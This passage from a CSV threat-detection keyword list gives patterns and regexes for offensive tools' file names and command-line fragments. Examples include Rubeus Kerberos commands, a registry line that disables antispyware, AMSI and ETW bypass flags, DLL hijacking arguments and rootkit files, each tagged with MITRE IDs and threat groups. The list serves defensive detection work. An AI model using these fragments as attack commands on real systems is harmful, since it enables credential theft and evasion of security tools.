Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","819" "* dementor.py*",".{0,1000}\sdementor\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","820" "* demiguise.py*",".{0,1000}\sdemiguise\.py.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. 
and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","N/A","9","10","1389","257","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z","821" "* demon.x64.exe*",".{0,1000}\sdemon\.x64\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","822" "* Dendron.exe*",".{0,1000}\sDendron\.exe.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","823" "* DenyOutboundFirewall.ahk*",".{0,1000}\sDenyOutboundFirewall\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","825" "* deploy_cobalt_beacon*",".{0,1000}\sdeploy_cobalt_beacon.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","826" "* DesertFox.go",".{0,1000}\sDesertFox\.go","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","827" "* -DestHost * -DestPort 5555 -UseDefaultProxy*",".{0,1000}\s\-DestHost\s.{0,1000}\s\-DestPort\s5555\s\-UseDefaultProxy.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controller running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","0","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","828" "* detect-hooks.c *",".{0,1000}\sdetect\-hooks\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt -
Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","0","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","829" "* dhcp_dns_update_utils.py*",".{0,1000}\sdhcp_dns_update_utils\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","830" "* dhcp-discover.nse*",".{0,1000}\sdhcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","831" "* dhcpd-noroute.conf*",".{0,1000}\sdhcpd\-noroute\.conf.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","832" "* diagrun=true service=DNS* dllpath=*.dll* computername=*",".{0,1000}\sdiagrun\=true\sservice\=DNS.{0,1000}\sdllpath\=.{0,1000}\.dll.{0,1000}\scomputername\=.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","N/A","7","1","77","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z","833" "* diamond * /certificate:*",".{0,1000}\sdiamond\s.{0,1000}\s\s\/certificate\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","834" "* diamond /tgtdeleg *",".{0,1000}\sdiamond\s\/tgtdeleg\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","835" "* diamond /user:*",".{0,1000}\sdiamond\s\/user\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","836" "* diamorphine.c*",".{0,1000}\sdiamorphine\.c.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","837" "* diamorphine.h*",".{0,1000}\sdiamorphine\.h.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","838" "* dicom-brute.nse*",".{0,1000}\sdicom\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","839" "* dicom-ping.nse*",".{0,1000}\sdicom\-ping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","840" "* dict-info.nse*",".{0,1000}\sdict\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","841" "* DigitalOceanProxyTab.java*",".{0,1000}\sDigitalOceanProxyTab\.java.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","842" "* DInvokeResolver.*",".{0,1000}\sDInvokeResolver\..{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","843" "* 
dirdevil.ps1*",".{0,1000}\sdirdevil\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","845" "* dirdevil_decoder_mini.ps1*",".{0,1000}\sdirdevil_decoder_mini\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","846" "* dirdevil_decoder_only.ps1*",".{0,1000}\sdirdevil_decoder_only\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","847" "* --dirnames bank financ payable payment reconcil remit voucher vendor eft swift *",".{0,1000}\s\-\-dirnames\sbank\sfinanc\spayable\spayment\sreconcil\sremit\svoucher\svendor\seft\sswift\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","848" "* dirty.c *",".{0,1000}\sdirty\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/FireFart/dirtycow","1","0","N/A","N/A","N/A","9","884","428","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z","849" "* dirtycow.c *",".{0,1000}\sdirtycow\.c\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","N/A","10","972","393","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z","850" "* Dirty-Pipe.*",".{0,1000}\sDirty\-Pipe\..{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/bbaranoff/CVE-2022-0847","1","0","N/A","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z","851" "* Dirty-Pipe.sh*",".{0,1000}\sDirty\-Pipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/puckiestyle/CVE-2022-0847","1","0","N/A","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z","852" "* Disable_defender.py*",".{0,1000}\sDisable_defender\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","853" "* DisableAntiSpyware 1 -Type Dword -Force -ea 
0*",".{0,1000}\sDisableAntiSpyware\s1\s\-Type\sDword\s\-Force\s\-ea\s0.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#registry","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","854" "* --disable-bypass-amsi*",".{0,1000}\s\-\-disable\-bypass\-amsi.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","855" "* --disable-bypass-cmdline*",".{0,1000}\s\-\-disable\-bypass\-cmdline.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","856" "* --disable-bypass-etw*",".{0,1000}\s\-\-disable\-bypass\-etw.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","857" "* DisableETW(*",".{0,1000}\sDisableETW\(.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","858" "* DisableWLDP(*",".{0,1000}\sDisableWLDP\(.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","859" "* distcc-cve2004-2687.nse*",".{0,1000}\sdistcc\-cve2004\-2687\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","860" "* --distribution kali-linux*",".{0,1000}\s\-\-distribution\skali\-linux.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","N/A","1","0","N/A","wsl.exe argument kali os","10","10","N/A","N/A","N/A","N/A","861" "* DLHell.py*",".{0,1000}\sDLHell\.py.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","862" "* --dll * --only *AmsiScanBuffer*AmsiScanString*",".{0,1000}\s\-\-dll\s.{0,1000}\s\-\-only\s.{0,1000}AmsiScanBuffer.{0,1000}AmsiScanString.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","863" "* --dll * --payload *",".{0,1000}\s\-\-dll\s.{0,1000}\s\-\-payload\s.{0,1000}","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","N/A","N/A","N/A","8","792","102","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z","864" "* -dll add_user.dll -dir *",".{0,1000}\s\-dll\sadd_user\.dll\s\-dir\s.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","865" "* -dll add_user.dll -printer *",".{0,1000}\s\-dll\sadd_user\.dll\s\-printer\s.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","866" "* --dll C:\Windows\System32\version.dll*--dll C:\Windows\System32\userenv.dll*",".{0,1000}\s\-\-dll\sC\:\\Windows\\System32\\version\.dll.{0,1000}\-\-dll\sC\:\\Windows\\System32\\userenv\.dll.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","867" "* --dll --dllhijack *",".{0,1000}\s\-\-dll\s\-\-dllhijack\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","868" "* DLLHound.ps1*",".{0,1000}\sDLLHound\.ps1.{0,1000}","offensive_tool_keyword","DLLHound","Find potential 
DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","0","N/A","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","869" "* dllinject.py*",".{0,1000}\sdllinject\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","870" "* dllinjection_rs.exe*",".{0,1000}\sdllinjection_rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","871" "* dll-installer.ps1*",".{0,1000}\sdll\-installer\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","872" "* -DllName * -FunctionName *",".{0,1000}\s\-DllName\s.{0,1000}\s\-FunctionName\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
